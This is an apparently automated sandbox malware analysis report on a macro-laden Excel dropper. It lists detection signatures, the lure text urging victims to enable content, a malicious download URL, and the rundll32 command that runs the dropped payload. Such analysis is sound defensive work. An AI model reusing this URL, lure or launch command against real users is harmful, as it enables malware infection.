Loading ...

Play interactive tourEdit tour

Analysis Report document-447482460.xls

Overview

General Information

Sample Name:document-447482460.xls
Analysis ID:433165
MD5:c956ee532ca3530d1f8ffa585e6fe375
SHA1:f99efeea7c2ca81ffbbd59ee904ae81cf44b3493
SHA256:8c00f69352886727d9ad19769e77bcfece11f499fb3da89dfb40396ccb06b330
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Outdated Microsoft Office dropper detected
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2436 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2580 cmdline: rundll32 ..\nxckew.wle,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-447482460.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x11d56:$e1: Enable Editing
  • 0x11dcb:$e2: Enable Content
document-447482460.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x134a2:$s1: Excel
  • 0x144fd:$s1: Excel
  • 0x37b4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-447482460.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\nxckew.wle,DllRegisterServer, CommandLine: rundll32 ..\nxckew.wle,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2436, ProcessCommandLine: rundll32 ..\nxckew.wle,DllRegisterServer, ProcessId: 2580

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus / Scanner detection for submitted sampleShow sources
    Source: document-447482460.xlsAvira: detected
    Antivirus detection for URL or domainShow sources
    Source: http://cyh26wcekai02atpeax.com/fera/frid.gifAvira URL Cloud: Label: malware
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: global trafficDNS query: name: cyh26wcekai02atpeax.com

    Networking:

    barindex
    Outdated Microsoft Office dropper detectedShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDNS query: cyh26wcekai02atpeax.com is down
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDNS query: cyh26wcekai02atpeax.com is down
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDNS query: cyh26wcekai02atpeax.com is down
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDNS query: cyh26wcekai02atpeax.com is down
    Source: unknownDNS traffic detected: query: cyh26wcekai02atpeax.com replaycode: Server failure (2)
    Source: rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: unknownDNS traffic detected: queries for: cyh26wcekai02atpeax.com
    Source: document-447482460.xlsString found in binary or memory: http://cyh26wcekai02atpeax.com/fera/frid.gif
    Source: rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2130864122.0000000001D57000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2130864122.0000000001D57000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: rundll32.exe, 00000003.00000002.2130864122.0000000001D57000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2130864122.0000000001D57000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2130864122.0000000001D57000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing" 11 from the yellow bar above 12 13 @Once You have Enable Editing, please click "E
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar above Once You have Enable Editing, please click "Enable Conte
    Source: Document image extraction number: 1Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or A
    Source: Document image extraction number: 6Screenshot OCR: Enable Editing" from the yellow bar above @Once You have Enable Editing, please click "EnableConte
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-447482460.xlsInitial sample: EXEC
    Source: document-447482460.xlsOLE indicator, VBA macros: true
    Source: document-447482460.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: document-447482460.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal88.troj.expl.evad.winXLS@3/5@4/0
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\160F0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRFDAF.tmpJump to behavior
    Source: document-447482460.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\nxckew.wle,DllRegisterServer
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\nxckew.wle,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\nxckew.wle,DllRegisterServerJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-447482460.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution21Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-447482460.xls100%AviraXF/Agent.B2

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://cyh26wcekai02atpeax.com/fera/frid.gif100%Avira URL Cloudmalware
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    cyh26wcekai02atpeax.com
    unknown
    unknowntrue
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2130864122.0000000001D57000.00000002.00000001.sdmpfalse
        high
        http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmpfalse
          high
          http://investor.msn.comrundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmpfalse
              high
              http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2130864122.0000000001D57000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://cyh26wcekai02atpeax.com/fera/frid.gifdocument-447482460.xlstrue
              • Avira URL Cloud: malware
              unknown
              http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2130864122.0000000001D57000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmpfalse
                high
                http://investor.msn.com/rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmpfalse
                  high

                  Contacted IPs

                  No contacted IP infos

                  General Information

                  Joe Sandbox Version:32.0.0 Black Diamond
                  Analysis ID:433165
                  Start date:11.06.2021
                  Start time:12:04:48
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 5m 1s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:document-447482460.xls
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:6
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal88.troj.expl.evad.winXLS@3/5@4/0
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xls
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Found warning dialog
                  • Click Ok
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/433165/sample/document-447482460.xls

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\050F0000
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):62922
                  Entropy (8bit):7.6710168506352945
                  Encrypted:false
                  SSDEEP:1536:cnHzWfiqrMMz9Sw3xNhVsSAc2frW2Z1lwASJYZ:cnTWfiqLTnjsSAc2frW2XlyS
                  MD5:4473FEFA6A9F351C07873106B8C938AB
                  SHA1:62F7E2A76DEE3CB5FD401E614CB4E073A02FD9AA
                  SHA-256:705BC9FE56692290560E62CF1A7095F8B8BD42D71EB7CF3DA267D6B43C31AEDE
                  SHA-512:69B142DFB1CAA3F8BA944E5D81CC74F018E393C5B15DD982DC1B894C76BD410DFB5AC84ABF3F3741895983F92834D6819803E77C3ABB08AE43347C14E698F8F9
                  Malicious:false
                  Reputation:low
                  Preview: .U.n.0....?..........C....I?.&..an.0.........#.z."..G.5.#D.......J..e.....X.I8%.w.- .Z|.4.......[...s...+......|.".... .Zt./g..\z...:e......x0......:V]...R-.6..u~...n.!B0Z.D...S{.j.Zi....Kf...... Y...c.....|C3...D...B.c.._..7.....^..p.i..VP..~.Km..O>.....$...5l$...o....8.4@kB.g.G...y..x.....n.$.x.G.=...3.63...,.r..!......../..o..L..5.gN.#.R.E.u..xvg7.{...)[....>.M.Ja.uO'.....iV.F...x...<.....AL...wh...4.N..._/...m^^g.........PK..........!..%b.............[Content_Types].xml ...(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Jun 11 18:05:52 2021, atime=Fri Jun 11 18:05:52 2021, length=16384, window=hide
                  Category:dropped
                  Size (bytes):867
                  Entropy (8bit):4.481517628504972
                  Encrypted:false
                  SSDEEP:12:85QbKhSLgXg/XAlCPCHaXEKB8VXB/XG44X+WnicvbTfbDtZ3YilMMEpxRljKw6Tg:85YKe/XT0K6VX34YeHDDv3q+rNru/
                  MD5:EAB077F882847D1BE9A8D21F4CC94485
                  SHA1:9E890ACC89741D7DD297EBB7332E94B02305993D
                  SHA-256:A706417477CEB3D58BC3DDF87B86A6095A233912978666736CB5B9302A2B12A1
                  SHA-512:CA6B9E1A2A24AF4A2DFA0163FDE76203E84DDF1F11C4EAFD14AF54881015D0F4EF680E83ECBD37BACE4CCFD4E649C967652CF53B17FDE7BA93A42E17BF966A97
                  Malicious:false
                  Reputation:low
                  Preview: L..................F...........7G...bX..^...bX..^...@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\377142\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......377142..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-447482460.LNK
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:19 2020, mtime=Fri Jun 11 18:05:52 2021, atime=Fri Jun 11 18:05:52 2021, length=88576, window=hide
                  Category:dropped
                  Size (bytes):2108
                  Entropy (8bit):4.539833983921728
                  Encrypted:false
                  SSDEEP:48:8b/XT0ZVXbgNMN+Qh2b/XT0ZVXbgNMN+Q/:8b/XuVXb/+Qh2b/XuVXb/+Q/
                  MD5:FA5D7C43CCEBB912344C53A3B80EDAB2
                  SHA1:C317B4BA1F571CE5BCA12A2FE18A8AF2B49A7687
                  SHA-256:64A95B43BD8BD5FE9A9AD44F607B24AB2C468AFC4596DB88B52F3A94DB3906C1
                  SHA-512:5F9DB72318FC4FAA63AA0DB6B8781299A72659031723FC7512D13CC5053E610301AD7A938C91709F0F2547695D10B00D23FBB3B81523B3391DE73DF3176D0D7E
                  Malicious:false
                  Reputation:low
                  Preview: L..................F.... .....\..{...bX..^...Hd..^...Z...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2..Z...R.. .DOCUME~1.XLS..Z.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.4.4.7.4.8.2.4.6.0...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\377142\Users.user\Desktop\document-447482460.xls.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.4.4.7.4.8.2.4.6.0...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......377142..........D_....3N...W..
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):107
                  Entropy (8bit):4.7041366406487235
                  Encrypted:false
                  SSDEEP:3:oyBVomMY9LRRdzprXCZELRRdzprXCmMY9LRRdzprXCv:dj6Y9LzdqELzdSY9Lzd6
                  MD5:BB13025ED62A6FCDE7091729FEB6334B
                  SHA1:FEB4612E46438B1EDD8639C21B9E329A9C73D235
                  SHA-256:06FC777D7068CDEC783E8D140347BDB24CB737B00FE6195B25BE5B84A2695236
                  SHA-512:3805FA3247C49298BA3B8E15A58A928B9A40E714B48C90419711222B939B1537D0547287B3E2B0EE297721CC0D1DFB2D10C11B4E9F9043693A07630863C5D6AA
                  Malicious:false
                  Reputation:low
                  Preview: Desktop.LNK=0..[xls]..document-447482460.LNK=0..document-447482460.LNK=0..[xls]..document-447482460.LNK=0..
                  C:\Users\user\Desktop\160F0000
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Applesoft BASIC program data, first line number 16
                  Category:dropped
                  Size (bytes):122124
                  Entropy (8bit):4.287761039391329
                  Encrypted:false
                  SSDEEP:3072:ihcKoSsxzNDZLDZjlbR868O8Ku5LXkxEtjPOtioVjDGUU1qfDlaGGx+cL2QqCAH1:KcKoSsxzNDZLDZjlbR868O8Ku5LXkxEC
                  MD5:AE66505CC7DCE71E82A33B53148804DE
                  SHA1:B473F29DEB964E034E8E6544671ECFCEE528FD22
                  SHA-256:003330A6475F686A59077FD1E9C67876CC47FFA0667BBD5272010A8097B73E69
                  SHA-512:47BD64CA95D72BD7052E5FAB0414D02317804EA06641FF923248324A81DCADC11C8D9B4A30ED8AA0AC20D47C6BB162ADAE6FF133211FC646204FCA159B814389
                  Malicious:false
                  Reputation:low
                  Preview: ........g2.........................\.p.... B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

                  Static File Info

                  General

                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 26 09:29:22 2021, Security: 0
                  Entropy (8bit):3.4145380978437365
                  TrID:
                  • Microsoft Excel sheet (30009/1) 78.94%
                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                  File name:document-447482460.xls
                  File size:88576
                  MD5:c956ee532ca3530d1f8ffa585e6fe375
                  SHA1:f99efeea7c2ca81ffbbd59ee904ae81cf44b3493
                  SHA256:8c00f69352886727d9ad19769e77bcfece11f499fb3da89dfb40396ccb06b330
                  SHA512:16092ee5da7b51801fa3a002f7ef54e01376a330b4bd2bfb286f2d668402b32acf9cdc139e98193ed73d4148fb7f86e515534d0124aeb63f85162ddff72cb861
                  SSDEEP:1536:tIcKoSsxz1PDZLDZjlbR868O8KWc03Y7uDphYHceXVhca+fMHLtyeGx2zZ8dIOil:tIcKoSsxzNDZLDZjlbR868O8KWc03Y7D
                  File Content Preview:........................>......................................................................................................................................................................................................................................

                  File Icon

                  Icon Hash:e4eea286a4b4bcb4

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "document-447482460.xls"

                  Indicators

                  Has Summary Info:True
                  Application Name:Microsoft Excel
                  Encrypted Document:False
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:True
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros:True

                  Summary

                  Code Page:1251
                  Author:
                  Last Saved By:
                  Create Time:2006-09-16 00:00:00
                  Last Saved Time:2021-02-26 09:29:22
                  Creating Application:Microsoft Excel
                  Security:0

                  Document Summary

                  Document Code Page:1251
                  Thumbnail Scaling Desired:False
                  Contains Dirty Links:False
                  Shared Document:False
